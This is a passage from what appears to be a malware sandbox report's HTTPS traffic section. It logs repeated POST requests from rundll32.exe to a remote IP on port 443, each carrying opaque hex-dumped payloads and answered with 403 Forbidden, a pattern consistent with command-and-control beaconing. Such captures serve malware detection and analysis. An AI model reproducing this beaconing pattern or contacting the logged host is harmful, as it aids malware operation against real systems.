                                                                                                      2021-10-28 03:02:53 UTC154OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:54 UTC159INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:53 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      32192.168.2.449913192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:55 UTC159OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:55 UTC159OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:55 UTC164INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:55 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      33192.168.2.449917192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:57 UTC164OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:57 UTC164OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:57 UTC169INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:57 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      34192.168.2.449921192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:02:58 UTC169OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:02:58 UTC169OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:02:59 UTC174INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:02:59 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      35192.168.2.449925192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:00 UTC174OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:00 UTC174OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:01 UTC179INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:01 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      36192.168.2.449929192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:02 UTC179OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:02 UTC179OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:03 UTC184INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:03 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      37192.168.2.449933192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:06 UTC184OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:06 UTC184OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:07 UTC189INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:07 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      38192.168.2.449938192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:08 UTC189OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:08 UTC189OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:09 UTC194INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:09 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      39192.168.2.449945192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:10 UTC194OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:10 UTC194OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:11 UTC199INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:11 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      4192.168.2.449792192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:01:58 UTC19OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:01:58 UTC20OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:01:58 UTC24INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:01:58 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      40192.168.2.449952192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:12 UTC199OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:12 UTC199OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:13 UTC204INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:13 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      41192.168.2.449959192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:14 UTC204OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:14 UTC204OUTData Raw: d6 9b 07 eb 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 56 d3 3b ce 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: &S_L=&G]e;WI-2@FW-ZtO%m0=kV;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:15 UTC209INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:15 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      42192.168.2.449964192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:16 UTC209OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4865
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
                                                                                                      2021-10-28 03:03:16 UTC209OUTData Raw: ca 05 67 80 10 09 26 a5 53 b2 5f a3 4c 3d 1e 9c e9 fe 26 ff fa af f6 47 00 13 81 c0 8f 5d c6 1a f4 a4 ea 65 3b 57 d9 b1 96 f8 fd ee d0 49 9a dd ae ef 2d 32 91 09 40 46 57 2d dd 5a 74 4f 25 f1 6d ab 93 0d 14 fd 30 90 09 b3 8f 3d 6b 05 37 cd 3b 8c 00 53 ff 67 eb 60 f6 41 54 31 97 d0 5d 17 8c 3e 91 70 4c 32 4c 65 54 c8 63 97 5d 23 fa 2a 14 6f de d4 1a 49 98 d0 cd f3 0d a7 96 2b ec 24 e9 2e 89 0e fc 7e 0a f1 b7 13 34 b3 9e 57 0f cb ff 31 51 80 3c ff e4 fd f5 72 19 b7 38 32 21 16 fe 6a 9c 5f a5 01 08 28 42 94 6a 45 75 b1 ac 32 a4 69 59 d9 0f ad e0 d5 2a d3 f1 0e a5 7f cc a9 fd 99 ad e5 b3 61 c1 84 dd 0f 01 c7 a5 7f fa 55 f8 5a 72 b8 2e 8a 05 6e bd d3 26 9f 0a f3 2b 7a 32 12 88 0a 73 5f b9 34 8a 87 29 58 b8 34 90 eb 3e fe d4 cc a8 72 58 c0 a6 32 66 30 01 c0 35
                                                                                                      Data Ascii: g&S_L=&G]e;WI-2@FW-ZtO%m0=k7;Sg`AT1]>pL2LeTc]#*oI+$.~4W1Q<r82!j_(BjEu2iY*aUZr.n&+z2s_4)X4>rX2f05
                                                                                                      2021-10-28 03:03:17 UTC214INHTTP/1.1 403 Forbidden
                                                                                                      Server: nginx/1.15.12
                                                                                                      Date: Thu, 28 Oct 2021 03:03:17 GMT
                                                                                                      Content-Type: text/plain; charset=utf-8
                                                                                                      Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                      43192.168.2.449968192.46.210.220443C:\Windows\SysWOW64\rundll32.exe
                                                                                                      TimestampkBytes transferredDirectionData
                                                                                                      2021-10-28 03:03:18 UTC214OUTPOST / HTTP/1.1
                                                                                                      Host: 192.46.210.220
                                                                                                      Content-Length: 4853
                                                                                                      Connection: Close
                                                                                                      Cache-Control: no-cache
